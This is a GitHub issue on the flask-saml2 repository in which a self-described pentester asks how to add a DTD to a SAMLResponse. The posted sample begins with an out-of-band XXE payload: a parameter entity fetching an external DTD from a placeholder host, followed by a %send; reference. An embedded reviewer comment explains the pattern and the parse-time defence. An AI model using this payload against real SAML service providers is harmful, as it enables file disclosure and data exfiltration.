mx-moth / flask-saml2

Flask library for building SAML Service Providers and Identity Providers
MIT License

How to add a DTD to the SAMLResponse? #30

Open abrahack opened 3 years ago

abrahack commented 3 years ago

Hello,

I came across this awesome project of yours while pentesting, and I have some questions.

<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY % remote SYSTEM "http://ping.local.com/foo"> %remote; %send;]>
<!--
  Sample from the issue: a SAMLResponse with a DOCTYPE placed in front of it.
  The internal subset declares the parameter entity "remote" with an external
  SYSTEM identifier, then references %remote; and %send;. %send; is not
  declared anywhere in this document.

  Reviewer note: SAML messages are defined by XML Schema and never need a DTD.
  A consumer should parse inbound messages with DTD processing and external
  entity resolution disabled (and no network access for the parser), or reject
  any message that carries a DOCTYPE. That decision has to be made at parse
  time: the ds:Signature check operates on the already parsed document, so it
  does not guard against entity resolution.

  The ds:Signature contents below are elided ("...") in the original post.
-->
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:9000/saml/acs/" ID="_b4e5466d30d343a39b281c89699558dd" InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost:8000/saml/metadata.xml</saml:Issuer>
  <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        ...
  </ds:Signature>
  <samlp:Status>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  </samlp:Status>
  <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_79630753cb3f44158e5cae1849045bf3" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
    <saml:Issuer>http://localhost:8000/saml/metadata.xml</saml:Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      ...
    </ds:Signature>
    <saml:Subject>
      <saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="http://localhost:9000/saml/metadata.xml">example@example.com</saml:NameID>
      <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
        <saml:SubjectConfirmationData InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00" Recipient="http://localhost:9000/saml/acs/"/>
      </saml:SubjectConfirmation>
    </saml:Subject>
    <saml:Conditions NotBefore="2021-05-09T21:51:51.309039+00:00" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00">
      <saml:AudienceRestriction>
        <saml:Audience>http://localhost:9000/saml/metadata.xml</saml:Audience>
      </saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AuthnStatement AuthnInstant="2021-05-09T21:54:51.309039+00:00">
      <saml:AuthnContext>
        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
      </saml:AuthnContext>
    </saml:AuthnStatement>
    <saml:AttributeStatement>
      <saml:Attribute Name="foo" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
        <saml:AttributeValue>bar</saml:AttributeValue>
      </saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>

Thanks in advance for your help. Regards, @abrahack.